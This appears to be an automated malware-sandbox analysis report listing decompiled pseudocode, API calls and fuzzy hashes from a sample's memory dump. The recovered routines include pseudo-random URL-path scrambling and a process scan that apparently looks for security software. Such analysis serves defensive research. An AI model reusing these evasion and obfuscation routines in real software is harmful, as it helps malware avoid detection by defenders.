                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 648b233eb080983d4e4028f24f52f4aeb346ede113daf46328cd02014b440e40
                                                          • Instruction ID: 944a9c64ae43a36a4266f74986052a5c2d0269536a33dad9935e64d6061d04ef
                                                          • Opcode Fuzzy Hash: 648b233eb080983d4e4028f24f52f4aeb346ede113daf46328cd02014b440e40
                                                          • Instruction Fuzzy Hash: B931EEB5900309EFEB21DFA5D8C499EBBBCEB08344F20497AE942E6161D734AA45DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E049536B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E04953BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E04954F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E0495A2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x495d2ac, 1, 0,  *0x495d344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E0495A446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E0495853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E04954F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E049511EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}












                                                          APIs
                                                          • CreateEventA.KERNEL32(0495D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,049552AA,?,00000001,?), ref: 04953702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,049552AA,?,00000001,?,00000002,?,?,04955D5E,?), ref: 0495370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,049552AA,?,00000001,?,00000002,?,?,04955D5E,?), ref: 0495371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,049552AA,?,00000001,?,00000002,?,?,04955D5E,?), ref: 04953721
                                                            • Part of subcall function 0495A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04953741,?,04953741,?,?,?,?,?,04953741,?), ref: 0495A520
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 63ff51b424306fa867e18cbd6da804a624373969118d3f8fe2fe8e116d056a7b
                                                          • Instruction ID: 5f1f54ba52e66e4d45c87d3cd8df23f5bfafbaa8d3a053061ea4e58b256dd5ba
                                                          • Opcode Fuzzy Hash: 63ff51b424306fa867e18cbd6da804a624373969118d3f8fe2fe8e116d056a7b
                                                          • Instruction Fuzzy Hash: BF2168B2D00315ABDF20FFE498858AEB7ADDB84394B254575EE11E7110D734B9458760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E049517E5(unsigned int __eax, void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _t21;
                                                          				signed short _t23;
                                                          				char* _t27;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				unsigned int _t33;
                                                          				void* _t37;
                                                          				unsigned int _t38;
                                                          				void* _t41;
                                                          				void* _t42;
                                                          				int _t45;
                                                          				void* _t46;
                                                          
                                                          				_t42 = __eax;
                                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                          				_t38 = __eax;
                                                          				_t30 = RtlAllocateHeap( *0x495d238, 0, (__eax >> 3) + __eax + 1);
                                                          				_v12 = _t30;
                                                          				if(_t30 != 0) {
                                                          					_v8 = _t42;
                                                          					do {
                                                          						_t33 = 0x18;
                                                          						if(_t38 <= _t33) {
                                                          							_t33 = _t38;
                                                          						}
                                                          						_t21 =  *0x495d250; // 0xac7a01ce
                                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                          						 *0x495d250 = _t23;
                                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                          						memcpy(_t30, _v8, _t45);
                                                          						_v8 = _v8 + _t45;
                                                          						_t27 = _t30 + _t45;
                                                          						_t38 = _t38 - _t45;
                                                          						_t46 = _t46 + 0xc;
                                                          						 *_t27 = 0x2f;
                                                          						_t13 = _t27 + 1; // 0x1
                                                          						_t30 = _t13;
                                                          					} while (_t38 > 8);
                                                          					memcpy(_t30, _v8, _t38 + 1);
                                                          				}
                                                          				return _v12;
                                                          			}


















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04951C49,00000000,?,?,049520C2,?,04DD95B0), ref: 049517F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04951808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04951C49,00000000,?,?,049520C2,?,04DD95B0), ref: 0495184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0495186D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 5102a73af2ffcb24d6d283df27eac2136594a6fb35fab0a8a1ad468192de55d2
                                                          • Instruction ID: 5dede0b5454bf83516ba272085e48bae708db4f814d5efc898b9b063ed8bd33e
                                                          • Opcode Fuzzy Hash: 5102a73af2ffcb24d6d283df27eac2136594a6fb35fab0a8a1ad468192de55d2
                                                          • Instruction Fuzzy Hash: 2B118672A04214AFD710CB69EC85E9EBFBEDBC4660B254276F904DB150E774AE0587A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0495486F(char* __eax) {
                                                          				char* _t8;
                                                          				intOrPtr _t12;
                                                          				char* _t21;
                                                          				signed int _t23;
                                                          				char* _t24;
                                                          				signed int _t26;
                                                          				void* _t27;
                                                          
                                                          				_t21 = __eax;
                                                          				_push(0x20);
                                                          				_t23 = 1;
                                                          				_push(__eax);
                                                          				while(1) {
                                                          					_t8 = StrChrA();
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					_t23 = _t23 + 1;
                                                          					_push(0x20);
                                                          					_push( &(_t8[1]));
                                                          				}
                                                          				_t12 = E0495A71F(_t23 << 2);
                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                          				if(_t12 != 0) {
                                                          					StrTrimA(_t21, 0x495c284);
                                                          					_t26 = 0;
                                                          					do {
                                                          						_t24 = StrChrA(_t21, 0x20);
                                                          						if(_t24 != 0) {
                                                          							 *_t24 = 0;
                                                          							_t24 =  &(_t24[1]);
                                                          							StrTrimA(_t24, 0x495c284);
                                                          						}
                                                          						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                          						_t26 = _t26 + 1;
                                                          						_t21 = _t24;
                                                          					} while (_t24 != 0);
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                          				}
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,04DD95AC,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 04954889
                                                          • StrTrimA.SHLWAPI(?,0495C284,00000002,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 049548A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 049548B3
                                                          • StrTrimA.SHLWAPI(00000001,0495C284,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 049548C5
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: 6cd825c886683b13ac4a02162ceab49d2dc88348235a7864d6bb1a66be6d7d5f
                                                          • Instruction ID: 3a3b113d4bb4e46c1b2c4dee805931c291919f5286f1b02897538b485cd12574
                                                          • Opcode Fuzzy Hash: 6cd825c886683b13ac4a02162ceab49d2dc88348235a7864d6bb1a66be6d7d5f
                                                          • Instruction Fuzzy Hash: C201B5716053519BD221DE659C48F27BF9CEB85A64F310638FE41D7250EB60E80197E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E0495A65C() {
                                                          				char _v264;
                                                          				void* _v300;
                                                          				int _t8;
                                                          				intOrPtr _t9;
                                                          				int _t15;
                                                          				void* _t17;
                                                          
                                                          				_t15 = 0;
                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                          				if(_t17 != 0) {
                                                          					_t8 = Process32First(_t17,  &_v300);
                                                          					while(_t8 != 0) {
                                                          						_t9 =  *0x495d2a8; // 0x47a5a8
                                                          						_t2 = _t9 + 0x495ee34; // 0x73617661
                                                          						_push( &_v264);
                                                          						if( *0x495d0fc() != 0) {
                                                          							_t15 = 1;
                                                          						} else {
                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                          							continue;
                                                          						}
                                                          						L7:
                                                          						CloseHandle(_t17);
                                                          						goto L8;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				L8:
                                                          				return _t15;
                                                          			}










                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0495A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0495A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0495A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0495A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 8216eccf43fad03b5f3c7a3c160c53eedb31321a69eacc403a473d63dfa10de8
                                                          • Instruction ID: 12494022d3c68c9771999f27df8b9935a9fc07ff1ad0ba60ce8c15a6328b476d
                                                          • Opcode Fuzzy Hash: 8216eccf43fad03b5f3c7a3c160c53eedb31321a69eacc403a473d63dfa10de8
                                                          • Instruction Fuzzy Hash: EBF0BB366021196AE721FA769C49EDB7BACDBC5314F210371ED05C3110EA24EA8587A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04956840(void* __esi) {
                                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          
                                                          				_v4 = 0;
                                                          				memset(__esi, 0, 0x38);
                                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                                          				 *(__esi + 0x1c) = _t8;
                                                          				if(_t8 != 0) {
                                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                                          					 *(__esi + 0x20) = _t10;
                                                          					if(_t10 == 0) {
                                                          						CloseHandle( *(__esi + 0x1c));
                                                          					} else {
                                                          						_v4 = 1;
                                                          					}
                                                          				}
                                                          				return _v4;
                                                          			}







                                                          APIs
                                                          • memset.NTDLL ref: 0495684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 04956863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04956870
                                                          • CloseHandle.KERNEL32(?), ref: 04956882
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: d6e14c5abb855c5586d179f622c518d9d95766118bac4bc8eb856040d2c6d54c
                                                          • Instruction ID: 77aeee100dcafde5e0f782281f2ed380e37c86779d68acb4a6c847e9ecfad060
                                                          • Opcode Fuzzy Hash: d6e14c5abb855c5586d179f622c518d9d95766118bac4bc8eb856040d2c6d54c
                                                          • Instruction Fuzzy Hash: 58F0FEF15043087FD710AF66DCC4C27BBACEB95299B214E3EF54682521D676AC498B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E049523F4(void** __esi) {
                                                          				char* _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				intOrPtr _t11;
                                                          				void* _t12;
                                                          				void** _t14;
                                                          
                                                          				_t14 = __esi;
                                                          				_t4 =  *0x495d32c; // 0x4dd95b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x495d32c; // 0x4dd95b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t14;
                                                          				if(_t8 != 0 && _t8 != 0x495d030) {
                                                          					HeapFree( *0x495d238, 0, _t8);
                                                          				}
                                                          				_t14[1] = E0495486F(_v0, _t14);
                                                          				_t11 =  *0x495d32c; // 0x4dd95b0
                                                          				_t12 = _t11 + 0x40;
                                                          				__imp__(_t12);
                                                          				return _t12;
                                                          			}











                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 049523FD
                                                          • Sleep.KERNEL32(0000000A,?,04955D25), ref: 04952407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04955D25), ref: 0495242F
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 0495244B
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 8b66f13373abf038943e3a0048f6c62a041135549bba06cf1f87bed61b188dd8
                                                          • Instruction ID: d6b1994d9395d26c7313908ee33f91a07631bb79e95ee2275d0b42ec3066415e
                                                          • Opcode Fuzzy Hash: 8b66f13373abf038943e3a0048f6c62a041135549bba06cf1f87bed61b188dd8
                                                          • Instruction Fuzzy Hash: 98F0B2706093809BEB50DF78E948B167BECEF19785B348564F941DA260C638EC818B25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04951B42() {
                                                          				void* _t1;
                                                          				intOrPtr _t5;
                                                          				void* _t6;
                                                          				void* _t7;
                                                          				void* _t11;
                                                          
                                                          				_t1 =  *0x495d26c; // 0x2b4
                                                          				if(_t1 == 0) {
                                                          					L8:
                                                          					return 0;
                                                          				}
                                                          				SetEvent(_t1);
                                                          				_t11 = 0x7fffffff;
                                                          				while(1) {
                                                          					SleepEx(0x64, 1);
                                                          					_t5 =  *0x495d2bc; // 0x0
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					_t11 = _t11 - 0x64;
                                                          					if(_t11 > 0) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				_t6 =  *0x495d26c; // 0x2b4
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x495d238; // 0x49e0000
                                                          				if(_t7 != 0) {
                                                          					HeapDestroy(_t7);
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • SetEvent.KERNEL32(000002B4,00000001,04954F0E), ref: 04951B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04951B5C
                                                          • CloseHandle.KERNEL32(000002B4), ref: 04951B7D
                                                          • HeapDestroy.KERNEL32(049E0000), ref: 04951B8D
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 548b076b04c1903bcd394335210f699fd0e0a8a14f308e663106091b09c0a62a
                                                          • Instruction ID: b3dd61fd5e49e80b00feba34ff5c6397143949095c84d5fbe2dadd7b771c045f
                                                          • Opcode Fuzzy Hash: 548b076b04c1903bcd394335210f699fd0e0a8a14f308e663106091b09c0a62a
                                                          • Instruction Fuzzy Hash: 38F0F871A093119BEA109A35F849F163E9CEB04B61B294330FC08D72A4EB28EC409760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E04956702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x495d32c; // 0x4dd95b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x495d32c; // 0x4dd95b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x495d32c; // 0x4dd95b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x495e81a) {
                                                          					HeapFree( *0x495d238, 0, _t10);
                                                          					_t7 =  *0x495d32c; // 0x4dd95b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 0495670B
                                                          • Sleep.KERNEL32(0000000A,?,04955D25), ref: 04956715
                                                          • HeapFree.KERNEL32(00000000,?,?,04955D25), ref: 04956743
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 04956758
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: cf473385c7a9d8e643287124ba77da9bbed96bc18b2c63c5082bb784cc02119a
                                                          • Instruction ID: d96740e49d647a248240521df42954a877677570c4eac30ba53c597b5a953fdf
                                                          • Opcode Fuzzy Hash: cf473385c7a9d8e643287124ba77da9bbed96bc18b2c63c5082bb784cc02119a
                                                          • Instruction Fuzzy Hash: 09F0D474A083009BEB18CF74E999F197BEDEB49755B648139E906D7270C738EC00CB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04955AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E0495A71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E0495A71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E0495A734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E0495A782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E0495A782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}















                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04953E08,?,?,?,?,00000102,049567B8,?,?,00000000), ref: 04955AFD
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                            • Part of subcall function 0495A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04955B2B,00000000,00000001,00000001,?,?,04953E08,?,?,?,?,00000102), ref: 0495A790
                                                            • Part of subcall function 0495A782: StrChrA.SHLWAPI(?,0000003F,?,?,04953E08,?,?,?,?,00000102,049567B8,?,?,00000000,00000000), ref: 0495A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04953E08,?,?,?,?,00000102,049567B8,?), ref: 04955B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04955B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04955B77
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: fce52e7ee20a7ebaf8566d8e9e9b91b16a83fecb4bac33d2e4b5308305cc7a99
                                                          • Instruction ID: 61b0dd41006fc75cbe9b740c3a4f284b37a5ac820e483e6e8b000806c06f6cd9
                                                          • Opcode Fuzzy Hash: fce52e7ee20a7ebaf8566d8e9e9b91b16a83fecb4bac33d2e4b5308305cc7a99
                                                          • Instruction Fuzzy Hash: 5221A175504215FFDB119F74C848AAE7FBAAF462A4B254170FD049B225D634E90087A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E049545C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E0495A71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}









                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04DD935C,?,04958D93,004F0053,04DD935C,?,?,?,?,?,?,0495523E), ref: 049545D6
                                                          • lstrlenW.KERNEL32(04958D93,?,04958D93,004F0053,04DD935C,?,?,?,?,?,?,0495523E), ref: 049545DD
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04958D93,004F0053,04DD935C,?,?,?,?,?,?,0495523E), ref: 049545FD
                                                          • memcpy.NTDLL(74B069A0,04958D93,00000002,00000000,004F0053,74B069A0,?,?,04958D93,004F0053,04DD935C), ref: 04954610
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 5bc868e6c30ca510743a876650afc12e6d9245a26ebda2ee77300f05b9940e04
                                                          • Instruction ID: 6c37f2891b2f92e0255396936da89882cf3c366ac3ae689ee201885e470542d7
                                                          • Opcode Fuzzy Hash: 5bc868e6c30ca510743a876650afc12e6d9245a26ebda2ee77300f05b9940e04
                                                          • Instruction Fuzzy Hash: 5AF04F36900118BBDF11EFA8CC84C9F7BACEF482547214062ED08D7111E631EE158BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(04DD9A78,00000000,00000000,7742C740,049520ED,00000000), ref: 0495362A
                                                          • lstrlen.KERNEL32(?), ref: 04953632
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • lstrcpy.KERNEL32(00000000,04DD9A78), ref: 04953646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04953651
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 3dccf047fafe144911b28f7f1469b4ec158c2cfdb911066b36f6c062b802710a
                                                          • Instruction ID: 80bd877111c9d94b928bd20c57ec1e95eda6a07a3423e0149427889f1004c2cf
                                                          • Opcode Fuzzy Hash: 3dccf047fafe144911b28f7f1469b4ec158c2cfdb911066b36f6c062b802710a
                                                          • Instruction Fuzzy Hash: 57E01273905721678B11ABF4AC48C5FBFADEFD96557240537FA00D7110C7299C058BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%